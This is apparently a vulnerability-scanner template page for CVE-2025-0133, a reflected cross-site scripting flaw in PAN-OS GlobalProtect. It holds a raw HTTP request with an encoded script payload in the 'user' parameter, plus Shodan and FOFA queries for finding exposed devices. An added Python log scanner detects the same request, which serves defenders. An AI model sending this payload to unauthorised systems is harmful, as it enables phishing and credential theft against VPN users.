PAN-OS - Reflected Cross-Site Scripting
CVE-2025-0133
Verified
Description
A reflected cross-site scripting (XSS) vulnerability in the GlobalProtect™ gateway and portal features of Palo Alto Networks PAN-OS® software enables execution of malicious JavaScript in the context of an authenticated Captive Portal user's browser when they click on a specially crafted link. The primary risk is phishing attacks that can lead to credential theft, particularly if you enabled Clientless VPN.
Severity
Medium
Exploit Probability
4%
Affected Product
pan-os
Published Date
June 13, 2025
Template Author
xbow, dhiyaneshdk
CVE-2025-0133.yaml
id: CVE-2025-0133

info:
  name: PAN-OS - Reflected Cross-Site Scripting
  author: xbow,DhiyaneshDK
  severity: medium
  description: |
    A reflected cross-site scripting (XSS) vulnerability in the GlobalProtect™ gateway and portal features of Palo Alto Networks PAN-OS® software enables execution of malicious JavaScript in the context of an authenticated Captive Portal user's browser when they click on a specially crafted link. The primary risk is phishing attacks that can lead to credential theft, particularly if you enabled Clientless VPN.
  impact: |
    Authenticated Captive Portal users can be targeted with phishing attacks via crafted XSS links, potentially leading to credential theft, especially when Clientless VPN is enabled.
  remediation: |
    Upgrade to the patched version of PAN-OS as specified in the vendor security advisory.
  reference:
    - https://security.paloaltonetworks.com/CVE-2025-0133
    - https://hackerone.com/reports/3096384
  classification:
    epss-score: 0.03513
    epss-percentile: 0.87565
  metadata:
    verified: true
    max-request: 1
    shodan-query:
      - http.favicon.hash:"-631559155"
      - cpe:"cpe:2.3:o:paloaltonetworks:pan-os"
    fofa-query: icon_hash="-631559155"
    product: pan-os
    vendor: paloaltonetworks
  tags: hackerone,cve,cve2025,xss,panos,global-protect,vuln

http:
  - raw:
      - |
        GET /ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>prompt("XSS")</script>'
          - 'authentication cookie'
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402206432220d9f020d770137d7c47cbdb1dc9fff815de254ed6d2b4c068d56db626702204d76eb963503faceeebca96d5e8dcc86ef3f79e41f26fe1ae6ecdffbe84ef6dd:922c64590222798bb761d5b6d8e729505.0
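The template above probes the endpoint by reflecting markup through the user parameter. From the defender's side, the same request shape can be spotted in web server logs. The following is an added example, not part of the Nuclei template or of any Palo Alto Networks code: it parses constructed access-log lines in combined log format, isolates requests to /ssl-vpn/getconfig.esp, fully percent-decodes the user parameter and flags any value containing HTML tag markup. The log format, sample IPs and timestamps are assumptions for the demonstration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample log lines (combined log format); not real traffic.
# The second line reuses the encoded payload from the template's raw request.
SAMPLE_LOG = """\
203.0.113.5 - - [13/Jun/2025:10:01:02 +0000] "GET /ssl-vpn/getconfig.esp?client-type=1&user=alice&portal=us-vpn-gw-N HTTP/1.1" 200 512
203.0.113.9 - - [13/Jun/2025:10:01:07 +0000] "GET /ssl-vpn/getconfig.esp?client-type=1&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&portal=us-vpn-gw-N HTTP/1.1" 200 640
198.51.100.2 - - [13/Jun/2025:10:02:11 +0000] "GET /global-protect/login.esp HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
TARGET_PATH = "/ssl-vpn/getconfig.esp"
WATCHED_PARAMS = ("user",)            # parameter the template shows being reflected
MARKUP_RE = re.compile(r"<\s*/?\s*[a-zA-Z]")  # an opening or closing HTML tag

def decode_fully(value: str, rounds: int = 3) -> str:
    """Undo repeated percent-encoding so %253C and %3C both end up as '<'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_line(line: str):
    """Return a finding for a getconfig.esp request carrying markup, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if parts.path != TARGET_PATH:
        return None
    params = parse_qs(parts.query, keep_blank_values=True)  # decodes one layer
    for name in WATCHED_PARAMS:
        for raw in params.get(name, []):
            decoded = decode_fully(raw)
            if MARKUP_RE.search(decoded):
                return {"ip": m.group("ip"), "ts": m.group("ts"), "param": name,
                        "status": int(m.group("status")), "decoded": decoded}
    return None

def scan_log(text: str) -> list:
    """Scan every line of a log and collect the findings."""
    return [f for f in (scan_line(l) for l in text.splitlines()) if f]
```

A hit from a source that never completes a normal GlobalProtect login is a strong indicator of scanning for this issue; the status code is kept so that 200 responses on unpatched hosts can be prioritised.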
Remediation Steps
Upgrade to the patched version of PAN-OS as specified in the vendor security advisory.